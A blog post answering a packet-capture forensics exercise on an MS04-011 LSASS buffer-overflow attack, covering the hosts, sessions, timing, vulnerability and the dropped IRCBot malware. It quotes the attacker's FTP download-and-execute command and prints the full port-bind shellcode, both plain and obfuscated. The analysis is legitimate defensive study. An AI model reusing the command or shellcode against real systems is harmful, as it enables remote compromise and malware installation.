Tuesday, September 13, 2011

First PCAP Exercise


08-1461 FIRST PCAP EXERCISE (ANSWER)

1. Which systems (i.e. IP addresses) are involved? (2pts)

                Attacker: 98.114.205.102 Windows XP
                System being attacked: 192.150.11.111 Linux 2.4/2.6 host

(You can see the IP addresses in the source and destination column in Wireshark or Wireshark Statistics -> Endpoints -> IPv4)

2. What can you find out about the attacking host (e.g., where is it located)? (2pts) 

Hostname: pool-98-114-205-102.phlapa.fios.verizon.net
Country Code: US
Country Name: United States
Region: PA
Region Name: Pennsylvania
City: Southampton
Postal Code: 18966
Latitude: 40.1877
Longitude: -75.0058
ISP: Verizon Internet Services
Metro Code: 504
Area Code: 215
IP Address: 98.114.205.102
MAC Address: 0008E23B5601
ASN 19262
Subnet B - 98.114.0.0/16

(Tools used: I got these diagrams from searching for the attacker’s IP address 98.114.205.102 in http://www.robtex.com/ and http://www.maxmind.com/app/locate_demo_ip)

3. How many TCP sessions are contained in the dump file? (2pts)

There are 5 TCP sessions.

Address
Port
Address
Port
98.114.205.102
donnyworld (1821)
192.150.11.111
microsoft-ds (445)
98.114.205.102
itm-mcell-u (1828)
192.150.11.111
microsoft-ds (445)
192.150.11.111
unix-status (1957)
98.114.205.102
xiip (1924)
192.150.11.111
36296
98.114.205.102
8884
98.114.205.102
gtp-user (2152)
192.150.11.111
Socks (1080)

4. How long did it take to perform the attack? (2pts) 16.219218 seconds

Time from first packet to the last packet – 16.219218 seconds
First Packet 2009-04-19 20:28:28
Last Packet 2009-04-19 20:28:44
Packets 348
Average Packet/Sec – 21.456
Average Packet Size – 527.330 bytes
Average bytes/second – 11314.417
Average Mbit/second – 0.091

5. Which operating system was targeted by the attack? And which service? Which vulnerability? (6pts)
Operating System being attacked: Windows 5.1 (XP) Evidence: See frame 16 Native OS.

Service being attacked: Local Security Authority Subsystem Service (LSASS)

Vulnerability: MS04-011 (LSASS Buffer Overflow) The specific vulnerable system component is LSASRV.DLL. This issue is present within the Active Directory service functions which are exposed through the Local Security Authority System Service (LSASS) DCE/RPC endpoint. The vulnerable functionality is reportedly accessible over the LSARPC named pipe via TCP port 445. Impact: DSRoleUpgradeDownlevelServer is executed that lead to buffer over flow and consequently remote code execution.

(Source for MS04-011 Information: http://www.juniper.net/security/auto/vulnerabilities/vuln10108.html)

6. Can you sketch an overview of the general actions performed by the attacker? (5pts)

a.        The attacker connects to port 445 and conduct a port scan.

b.       Attacker will connect to IPC$ share on the system to be attacked (frame 20)

20            1.073151 98.114.205.102                       192.150.11.111                       SMB        152         
Tree Connect                          AndX Request, Path: \\192.150.11.111\ipc$

c.         Attacker requests \lsarpc (frame 23)

23            1.307145 98.114.205.102                       192.150.11.111                       SMB        158         
NT Create                               AndX Request, FID: 0x4000, Path: \lsarpc

d.  Attacker attacked the vulnerable host calling DsRoleUpgradeDownlevelServer() parameter which will overflow the stack through port 445 (frame 33).

33            1.805992 98.114.205.102                       192.150.11.111                       DSSETUP              454 DsRoleUpgradeDownlevelServer request[Long frame (3208 bytes)]

e.  The shellcode gets executed on the attacked system’s computer, it binds to port 1957 and the attacker will connect to this port, to send commands needed to download the malware (frame 36).

36            2.091833 98.114.205.102                       192.150.11.111                       TCP        62           
xiip > unix-status [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM=1

Note: Using Follow TCP stream you will see the command sent by the attacker:

echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe
ssms.exe
f.         Then the system being attacked will initiate an FTP connection to the attacker and will try to download a file name ssms.exe (frame 50).

220 NzmxFtpd 0wns j0
USER 1
331 Password required
PASS 1
230 User logged in.
SYST
215 NzmxFtpd
TYPE I
200 Type set to I.
PORT 192,150,11,111,4,56
200 PORT command successful.
RETR ssms.exe
150 Opening BINARY mode data connection
QUIT
226 Transfer complete.
221 Goodbye happy r00ting.

g.        Then the malware is executed. (frame 68).

7. What specific vulnerability was attacked? (2pts)

MS04-011 (LSASS Buffer Overflow) The specific vulnerable system component is LSASRV.DLL. This issue is present within the Active Directory service functions which are exposed through the Local Security Authority System Service (LSASS) DCE/RPC endpoint. The vulnerable functionality is reportedly accessible over the LSARPC named pipe via TCP port 445. Impact: DSRoleUpgradeDownlevelServer is executed that lead to buffer over flow and consequently remote code execution.

8. Was there malware involved? What is the name of the malware (We are not looking for a detailed malware analysis for this challenge)? (2pts)
Yes. The file from the FTP server - ssms.exe is a Malware.

Alias       
Trojan.Win32.Agent [Ikarus]              
Trojan.Win32.Agent.axpp [Kaspersky Lab]      
Trojan-Downloader.Win32.Banload [Ikarus]   
TrojanSpy:Win32/Banker!rts [Microsoft]          
W32.IRCBot.Gen [Symantec]             
W32/Rbot-Fam, W32/Rbot-Gen [Sophos]     
W32/Sdbot.worm.gen.g [McAfee]     
Win32/IRCBot.worm.Gen [AhnLab]               
Worm.RBot.Gen.6 [PC Tools]           
WORM_AGENT.ASCZ [Trend Micro]

9. Do you think this is a manual or an automated attack (2pts)?  Why?

Automated. Because the attack duration, considering that it is just a matter of seconds, is too fast to be a manual attack.

Bonus:

10. What actions does the shellcode perform? Please list the shellcode (10 pts)

The shellcode is a “port bind” shellcode - meaning a successful exploitation will lead to the opening of a TCP socket on the victim's host and to bind to it a command shell.

Unobfuscated shellcode:
\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF\xE9\x0C\x01\x00\x00\x5A\x64\xA1\x30\x00\x00\x00\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\x8B\xD8\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC1\x8B\x00\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x03\x59\xE8\x87\x00\x00\x00\x83\xC6\x0D\x52\x56\xFF\x57\xFC\x5A\x8B\xD8\x6A\x05\x59\xE8\x74\x00\x00\x00\x50\x50\x50\x50\x6A\x01\x6A\x02\xFF\x57\xEC\x8B\xD8\xC7\x07\x02\x00\x07\xA5\x33\xC0\x89\x47\x04\x6A\x10\x57\x53\xFF\x57\xF0\x6A\x01\x53\xFF\x57\xF4\x50\x50\x53\xFF\x57\xF8\x8B\xD0\x83\xEC\x44\x8B\xF4\x33\xC0\x6A\x10\x59\x89\x04\x8E\xE2\xFB\x89\x56\x38\x89\x56\x3C\x89\x56\x40\x66\xC7\x46\x2C\x01\x01\x8D\x47\x10\x50\x56\x33\xC9\x51\x51\x51\x6A\x01\x51\x51\xC7\x47\x3C\x63\x6D\x64\x00\x8D\x47\x3C\x50\x51\xFF\x57\xE0\x52\xFF\x57\xFC\x53\xFF\x57\xFC\x50\xFF\x57\xE4\x33\xC0\xAC\x85\xC0\x75\xF9\x51\x52\x56\x53\xFF\xD2\x5A\x59\xAB\xE2\xEE\x33\xC0\xC3\xE8\xEF\xFE\xFF\xFF\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x00\x43\x72\x65\x61\x74\x65\x50\x72\x6F\x63\x65\x73\x73\x41\x00\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x77\x73\x32\x5F\x33\x32\x00\x57\x53\x41\x53\x6F\x63\x6B\x65\x74\x41\x00\x62\x69\x6E\x64\x00\x6C\x69\x73\x74\x65\x6E\x00\x61\x63\x63\x65\x70\x74\x00\x63\x6C\x6F\x73\x65\x73\x6F\x63\x6B\x65\x74\x00

Obfuscated shellcode:
\xeb\x10\x5a\x4a\x33\xc9\x66\xb9\x7d\x01\x80\x34\x0a\x99\xe2\xfa\xeb\x05\xe8\xeb\xff\xff\xff\x70\x95\x98\x99\x99\xc3\xfd\x38\xa9\x99\x99\x99\x12\xd9\x95\x12\xe9\x85\x34\x12\xd9\x91\x12\x41\x12\xea\xa5\x12\xed\x87\xe1\x9a\x6a\x12\xe7\xb9\x9a\x62\x12\xd7\x8d\xaa\x74\xcf\xce\xc8\x12\xa6\x9a\x62\x12\x6b\xf3\x97\xc0\x6a\x3f\xed\x91\xc0\xc6\x1a\x5e\x9d\xdc\x7b\x70\xc0\xc6\xc7\x12\x54\x12\xdf\xbd\x9a\x5a\x48\x78\x9a\x58\xaa\x50\xff\x12\x91\x12\xdf\x85\x9a\x5a\x58\x78\x9b\x9a\x58\x12\x99\x9a\x5a\x12\x63\x12\x6e\x1a\x5f\x97\x12\x49\xf3\x9a\xc0\x71\x1e\x99\x99\x99\x1a\x5f\x94\xcb\xcf\x66\xce\x65\xc3\x12\x41\xf3\x9c\xc0\x71\xed\x99\x99\x99\xc9\xc9\xc9\xc9\xf3\x98\xf3\x9b\x66\xce\x75\x12\x41\x5e\x9e\x9b\x99\x9e\x3c\xaa\x59\x10\xde\x9d\xf3\x89\xce\xca\x66\xce\x69\xf3\x98\xca\x66\xce\x6d\xc9\xc9\xca\x66\xce\x61\x12\x49\x1a\x75\xdd\x12\x6d\xaa\x59\xf3\x89\xc0\x10\x9d\x17\x7b\x62\x10\xcf\xa1\x10\xcf\xa5\x10\xcf\xd9\xff\x5e\xdf\xb5\x98\x98\x14\xde\x89\xc9\xcf\xaa\x50\xc8\xc8\xc8\xf3\x98\xc8\xc8\x5e\xde\xa5\xfa\xf4\xfd\x99\x14\xde\xa5\xc9\xc8\x66\xce\x79\xcb\x66\xce\x65\xca\x66\xce\x65\xc9\x66\xce\x7d\xaa\x59\x35\x1c\x59\xec\x60\xc8\xcb\xcf\xca\x66\x4b\xc3\xc0\x32\x7b\x77\xaa\x59\x5a\x71\x76\x67\x66\x66\xde\xfc\xed\xc9\xeb\xf6\xfa\xd8\xfd\xfd\xeb\xfc\xea\xea\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc\xea\xea\xd8\x99\xdc\xe1\xf0\xed\xcd\xf1\xeb\xfc\xf8\xfd\x99\xd5\xf6\xf8\xfd\xd5\xf0\xfb\xeb\xf8\xeb\xe0\xd8\x99\xee\xea\xab\xc6\xaa\xab\x99\xce\xca\xd8\xca\xf6\xfa\xf2\xfc\xed\xd8\x99\xfb\xf0\xf7\xfd\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed\x99\xfa\xf5\xf6\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99


Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)